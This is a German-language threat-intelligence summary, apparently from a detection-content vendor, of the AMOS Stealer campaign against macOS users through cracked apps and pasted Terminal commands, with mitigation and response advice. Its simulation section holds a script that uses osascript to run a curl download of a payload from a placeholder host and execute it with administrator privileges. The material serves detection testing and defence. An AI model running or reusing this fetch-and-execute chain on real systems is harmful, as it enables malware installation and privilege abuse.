SOC Prime Bias: Mittel

08 May 2026 15:45 UTC

AMOS Stealer zielt mit „geknackten“ Apps auf macOS ab

Author Photo
SOC Prime Team linkedin icon Folgen
AMOS Stealer zielt mit „geknackten“ Apps auf macOS ab
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht beschreibt eine Kampagne, bei der Atomic macOS Stealer (AMOS) verteilt wird, indem er als gehackte Anwendungen getarnt oder den Nutzern das Ausführen von Terminal-Befehlen durch Kopieren und Einfügen befohlen wird. Nach dem Ausführen sammelt die Malware eine breite Palette an sensiblen Daten, darunter Anmeldeinformationen, Browser-Informationen, Kryptowährungs-Wallets, Dateien von Messaging-Anwendungen, VPN-Profile und persönliche Dokumente, die dann über HTTP oder HTTPS exfiltriert werden. Um statische Erkennungen zu vermeiden, wechseln die Betreiber die Domains und URLs während der Kampagne. Die Aktivität richtet sich an macOS-Nutzer, insbesondere solche, die inoffizielle oder raubkopierte Software suchen.

Untersuchung

Trend Vision One Telemetrie wurde verwendet, um die vollständige Infektionskette zu rekonstruieren, beginnend mit dem Herunterladen gehackter Anwendungen von haxmac.cc, gefolgt von Umleitungen über Zwischendomänen, Ausführung bösartiger Shell-Skripte, Erstellung von Launch-Daemons zur Persistenz, Bereitstellung von Daten in /tmp, Komprimierung in ZIP-Archive und Exfiltration zu rotierenden, von Angreifern kontrollierten Domains. Forscher erfassten die relevanten Befehlszeilen, Dateipfade und Verhaltensindikatoren, die mit jeder Stufe des Kompromisses verbunden sind.

Minderung

Organisationen sollten Benutzer über die Risiken von gehackter Software und Kopieren-Einfügen von Terminal-Befehlen informieren, Gatekeeper- und Notarisierungskontrollen durchsetzen und unnötige Skriptausführung auf macOS-Systemen einschränken. Verteidiger sollten auch nach verdächtiger curl and osascript -Aktivität Ausschau halten und den Zugriff auf bekannte bösartige Domains und IP-Adressen blockieren. Endpunkterkennungen sollten sich auf die unbefugte Erstellung von Launch-Daemons, das Verbergen von Dateien und ungewöhnliches Kollektieren oder Exfiltrieren von Dateien konzentrieren.

Antwort

Wenn AMOS-Aktivität erkannt wird, isolieren Sie den betroffenen Endpunkt, beenden Sie die bösartigen Prozesse, entfernen Sie versteckte Dateien wie .helper, .agent, und com.finder.helper.plist, und löschen Sie alle für die Exfiltration vorbereiteten Daten. Kompromittierte Anmeldeinformationen sollten widerrufen werden, und eine forensische Analyse sollte an allen wiederhergestellten Archiven durchgeführt werden. Die identifizierte bösartige Infrastruktur sollte blockiert und die Erkennungsinhalte aktualisiert werden, um die beobachteten Befehlsmuster zu überwachen.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- & Baseline-Preflight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu einer Fehldiagnose.

  • Angriffsgeschichte & Befehle:
    Ein Angreifer hat einen Phishing-Köder erhalten, der eine kurze AppleScript-Nutzlast liefert. Das Skript verwendet osascript um einen Shell-Befehl auszuführen (sh -c), der curl aufruft, um das AMOS Stealer-Binär aus einem bösartigen C2-Server herunterzuladen, es im Benutzerverzeichnis ~/Library/Application Support/ speichert und es dann mit erhöhten Rechten ausführt. Die Nutzung von osascript (einer signierten Apple-Binärdatei) tarnt die Aktivität als legitime Automatisierung, während curl einen unauffälligen Netzwerkdownload ermöglicht.

  • Regressionstest-Skript:

    # amos_stealer_simulation.sh
    # Simuliert die Ausführung des AMOS Stealers auf macOS mit osascript + curl
    # 1. Definiere bösartige URL (verwenden Sie einen harmlosen Platzhalter zur Sicherheit)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    # 2. AppleScript, das einen Shell-Befehl ausführt, um die Nutzlast herunterzuladen & auszuführen
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    # 3. Führt das AppleScript über osascript aus
    echo "$APPLESCRIPT" | osascript
    # 4. Pause kurz, um der Nutzlast Zeit zum Ausführen zu geben
    sleep 5
  • Bereinigungskommandos:

    # cleanup_amos_simulation.sh
    # Entfernt Artefakte, die durch die Simulation erstellt wurden
    # Entferne die heruntergeladene Nutzlast
    rm -f /tmp/payload.sh
    # Widerrufe alle temporären erhöhten Prozesse (falls noch laufend)
    pkill -f "/tmp/payload.sh" || true
    # Optional, löschen Sie die AppleScript-Ausführungshistorie
    # (macOS behält keinen persistenten Verlauf für osascript)
    echo "Bereinigung abgeschlossen."